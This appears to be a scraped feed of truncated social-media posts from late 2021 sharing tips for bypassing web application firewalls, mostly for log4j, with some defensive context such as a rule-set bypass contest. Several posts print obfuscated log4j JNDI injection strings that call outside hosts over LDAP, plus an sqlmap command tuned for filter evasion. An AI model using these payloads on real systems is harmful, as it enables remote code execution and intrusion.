it has been long time since i updated it.
anyway it has been rebuild to match @BurpBounty
new profile syntax, deleted another bb and add detection for ...January 1, 2022
#Red_Team_Tactics
1. WAF/IPS/DLP bypass Cheat Sheet
https://t.co/XgC9ZR1iKR
2. A flexible tool for redirecting a given program's TCP traffic to SOCKS5 ...December 30, 2021
I have created a simple python tool to generate list of log4j payloads which will help you to bypass WAF.
GitHub link : https://t.co/GQl46UW1u6
#py ...December 28, 2021
anyone in #BugBounty wanna help me bypass a WAF, I've got some basic post param html injection but wanna escalate to xss by bypassing the filters than ...December 25, 2021
Working AWS/Cloudfront #log4j WAF Bypass within the URI path
https:\/\/hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}} ...December 24, 2021
We have a honorary mention in our @coreruleset #log4j #WAF bypass contest. @denisaugsburger has managed to bypass our new log4j rule (but was detected ...December 23, 2021
for sqlmap bypass waf use this
--level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoa ...December 22, 2021
#bugbountytips #bugbounty How I Bypassed Incapsula WAF By Imperva #Pentesting #appsec #WAF
1. Vulnerability
2. How I bypassed #Incapsula WAF
3. ...December 22, 2021
So much for blocking log4j CVEs with your WAF
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://somesitehackerofhell.com/z}
https://t.co ...December 20, 2021
If you are blocked by a waf and cannot bypass it, retest on different days of the week. my target site blocked me every day except Wednesday and Sunda ...December 20, 2021